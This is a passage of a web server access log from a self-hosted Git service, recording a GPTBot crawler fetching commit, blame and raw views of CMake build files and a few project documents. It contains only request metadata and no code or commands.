"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43113] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33679] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33680] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43115] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10811] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10814] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43112] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43114] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11601] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10314] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fActivate.ps1" [Client 74.7.227.38] [Length 34265] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10813] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18129] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14318] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15811] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fpyvenv.cfg" [Client 74.7.227.38] [Length 23957] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:15:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 